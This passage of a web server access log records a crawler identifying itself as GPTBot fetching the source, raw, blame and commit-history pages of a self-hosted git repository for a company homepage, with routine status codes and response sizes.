+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html" +[17/Feb/2026:13:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" [Client 74.7.227.38] [Length 10074] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" +[17/Feb/2026:13:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" +[17/Feb/2026:13:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" +[17/Feb/2026:13:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146722] [Gzip 20.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" +[17/Feb/2026:13:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9870] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:13:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18325] [Gzip 6.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:13:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 74.7.227.38] [Length 15578] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:13:05:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 74.7.227.38] [Length 10760] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" +[17/Feb/2026:13:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 74.7.227.38] [Length 10325] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" +[17/Feb/2026:13:05:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 74.7.227.38] [Length 43840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" +[17/Feb/2026:13:05:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" +[17/Feb/2026:13:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:13:05:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" [Client 74.7.227.38] [Length 14306] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 24507] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" +[17/Feb/2026:13:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 18119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:13:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10806] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" +[17/Feb/2026:13:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" [Client 74.7.227.38] [Length 13813] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:13:05:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/script.js" [Client 74.7.227.38] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 74.7.227.38] [Length 11262] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:05:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 74.7.227.38] [Length 11263] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 74.7.227.38] [Length 11851] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:05:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 74.7.227.38] [Length 11850] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 74.7.227.38] [Length 10327] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" +[17/Feb/2026:13:05:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" [Client 74.7.227.38] [Length 12746] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" [Client 74.7.227.38] [Length 11438] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services" [Client 74.7.227.38] [Length 9925] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" [Client 74.7.227.38] [Length 10568] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" [Client 74.7.227.38] [Length 11458] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" [Client 74.7.227.38] [Length 11485] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" +[17/Feb/2026:13:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 74.7.227.38] [Length 10352] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" +[17/Feb/2026:13:05:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" +[17/Feb/2026:13:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" +[17/Feb/2026:13:05:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" +[17/Feb/2026:13:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 74.7.227.38] [Length 11185] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" +[17/Feb/2026:13:05:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 74.7.227.38] [Length 11186] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" +[17/Feb/2026:13:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/services" +[17/Feb/2026:13:05:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" +[17/Feb/2026:13:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" +[17/Feb/2026:13:05:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" [Client 74.7.227.38] [Length 10732] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" +[17/Feb/2026:13:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" [Client 74.7.227.38] [Length 10781] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" +[17/Feb/2026:13:05:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/.gitignore" +[17/Feb/2026:13:05:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 74.7.227.38] [Length 10353] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" +[17/Feb/2026:13:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" +[17/Feb/2026:13:05:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" [Client 74.7.227.38] [Length 11890] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" [Client 74.7.227.38] [Length 11610] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/types.ts" +[17/Feb/2026:13:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" [Client 74.7.227.38] [Length 10086] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/status.json" +[17/Feb/2026:13:05:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" [Client 74.7.227.38] [Length 11852] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" [Client 74.7.227.38] [Length 11013] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" [Client 74.7.227.38] [Length 11267] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9875] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" +[17/Feb/2026:13:05:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" [Client 74.7.227.38] [Length 11671] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 29791] [Gzip 10.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" +[17/Feb/2026:13:05:36 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" +[17/Feb/2026:13:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" +[17/Feb/2026:13:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] 